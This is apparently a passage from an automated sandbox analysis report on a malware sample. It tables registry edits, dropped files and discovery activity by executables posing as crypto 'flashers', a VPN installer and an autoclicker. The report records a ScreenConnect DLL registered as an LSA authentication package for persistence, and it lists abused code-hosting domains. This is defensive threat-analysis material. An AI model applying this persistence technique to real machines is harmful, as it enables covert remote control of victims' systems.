| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Boot or Logon Autostart Execution: Authentication Package
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800650039003700330036006400380031006500330038003900360035006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f00300000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f00300000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800650039003700330036006400380031006500330038003900360035006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\{9F774076-6CD0-06AE-2BE4-56DE2B8EA3E5}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID224.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\metadata | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\metadata | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFE0DDF9922708718E.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2691.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{736FB660-E369-072A-7D4C-F7BA8D69BA4E}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI23D5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI27EA.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\msedge_installer.log | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFCB1054E542D96845.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFDEC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{DE4078A1-CD72-8FC1-015A-9B8CF3511949}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF22C8E053AF4135F0.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA29D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e61bc20.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF0414A284F7937E3B.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF3BF21D66278E3BA0.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e71f629.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\Installer\e61bbf0.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{DE4078A1-CD72-8FC1-015A-9B8CF3511949} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA164.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e61bbed.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2473.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI26EF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF797DDB221BAFFD7F.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e61bc08.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFB42A18F8576A21E5.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{DE4078A1-CD72-8FC1-015A-9B8CF3511949}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{9F774076-6CD0-06AE-2BE4-56DE2B8EA3E5}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI30EF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e61bc36.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2596.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\wix{3E38E495-441B-B71E-19A8-658C81C8B012}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{736FB660-E369-072A-7D4C-F7BA8D69BA4E} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e61bc06.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e71f629.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{3E38E495-441B-B71E-19A8-658C81C8B012}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF9F8A1B3FE0C07BAA.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF2F2AACC8DE195F8E.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File created | C:\Windows\Installer\{DE4078A1-CD72-8FC1-015A-9B8CF3511949}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI81F2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\b8a32f05-0c52-4dc9-bc31-9e85b7fb9b1e.tmp | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\msedge_installer.log | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIBD74.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\main.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000c064fc76ba10f1f60000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000c064fc760000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900c064fc76000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dc064fc76000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000c064fc7600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
